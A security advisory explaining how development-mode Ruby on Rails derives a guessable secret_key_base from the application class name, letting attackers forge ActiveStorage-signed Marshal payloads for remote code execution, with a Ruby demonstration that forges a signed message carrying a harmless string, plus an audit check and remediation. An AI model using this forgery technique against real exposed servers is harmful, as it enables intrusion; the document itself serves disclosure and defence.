Description
In development mode, affected Ruby on Rails versions do not generate a random secret_key_base; they derive it deterministically from the application's class name (an MD5 digest of a name such as MyApp::Application). An attacker who knows or guesses that name can recompute the secret, derive the key used by the ActiveStorage message verifier, and attach a valid signature to a serialized payload of their choosing. Because ActiveStorage trusts the signature and deserializes the payload with Marshal, attacker-controlled objects are instantiated during deserialization, which can be escalated to arbitrary OS command execution on the server. The issue only affects applications running in development mode, but any development server reachable by an attacker is exploitable.
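The following added example (not code from the original page or from the Rails project) reproduces the signing and verification steps with plain Ruby so the weakness can be demonstrated without a Rails application. It assumes the Rails 5.2 derivation as described above: the development secret is MD5 of the application class name, the verifier key is PBKDF2-HMAC-SHA1 over that secret with the salt "ActiveStorage" and 1000 iterations, and signed messages have the form base64(Marshal.dump(value)) + "--" + HMAC-SHA1 hex digest. The application name, the constant names and the payload are constructed for the example; the payload is a harmless string, not a gadget chain.

```ruby
require "digest"
require "openssl"
require "securerandom"

# Development secret as derived by vulnerable Rails releases
# (assumption: Digest::MD5.hexdigest(self.class.name)).
def development_secret(app_class_name)
  Digest::MD5.hexdigest(app_class_name)
end

# Key derivation in the style of ActiveSupport::KeyGenerator
# (assumption: PBKDF2-HMAC-SHA1, 1000 iterations, 64-byte key, salt = verifier name).
def verifier_key(secret_key_base, salt = "ActiveStorage", iterations: 1000, key_size: 64)
  OpenSSL::PKCS5.pbkdf2_hmac(secret_key_base, salt, iterations, key_size, "sha1")
end

# Signing in the style of ActiveSupport::MessageVerifier#generate:
# strict base64 of the serialized value, "--", HMAC-SHA1 hex digest.
def sign(key, serialized)
  data = [serialized].pack("m0")
  "#{data}--#{OpenSSL::HMAC.hexdigest("SHA1", key, data)}"
end

# Constant-time string comparison so the check itself does not leak the MAC.
def constant_time_eq?(a, b)
  return false unless a.bytesize == b.bytesize
  left = a.unpack("C*")
  diff = 0
  b.each_byte { |byte| diff |= byte ^ left.shift }
  diff.zero?
end

# Verification: returns the raw serialized bytes on a valid MAC, nil otherwise.
# A vulnerable application would pass these bytes straight to Marshal.load.
def verify(key, signed)
  data, digest = signed.split("--", 2)
  return nil unless data && digest
  return nil unless constant_time_eq?(OpenSSL::HMAC.hexdigest("SHA1", key, data), digest)
  data.unpack1("m0")
end

# Attacker side: only the application class name is needed to produce a
# signature that the vulnerable development server will accept.
def forge(app_class_name, serialized_payload)
  sign(verifier_key(development_secret(app_class_name)), serialized_payload)
end

# Server side: does a verifier built from this secret_key_base accept the message?
def server_accepts?(secret_key_base, signed)
  !verify(verifier_key(secret_key_base), signed).nil?
end

# Configuration check: is the configured secret the guessable development value?
def weak_development_secret?(secret_key_base, app_class_name)
  constant_time_eq?(secret_key_base, development_secret(app_class_name))
end

if __FILE__ == $PROGRAM_NAME
  app = "Blog::Application"                     # constructed example name
  forged = forge(app, Marshal.dump("harmless")) # constructed, non-malicious payload
  puts "vulnerable secret accepts forged message: #{server_accepts?(development_secret(app), forged)}"
  puts "random secret accepts forged message:     #{server_accepts?(SecureRandom.hex(64), forged)}"
end
```

The decisive check is the last two calls: a verifier keyed from the predictable development secret accepts the forged message, while one keyed from a random secret_key_base rejects it. `weak_development_secret?` can be used as a quick audit of a running configuration against the application's class name.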
Remediation
Upgrade to a Ruby on Rails release that generates a random development-mode secret instead of deriving it from the application name (Rails 5.2.2.1, 6.0.0.beta3 and later). Until the upgrade is applied, do not expose a development-mode server to untrusted networks, and configure an explicit, randomly generated secret_key_base for the development environment so that the secret is no longer guessable.
References
Related Vulnerabilities
WebLogic Deserialization of Untrusted Data Vulnerability (CVE-2020-9546)
PrestaShop Improper Input Validation Vulnerability (CVE-2023-39530)
Internet Information Services CVE-2001-0146 Vulnerability (CVE-2001-0146)
Liferay Portal Cleartext Storage of Sensitive Information Vulnerability (CVE-2021-33325)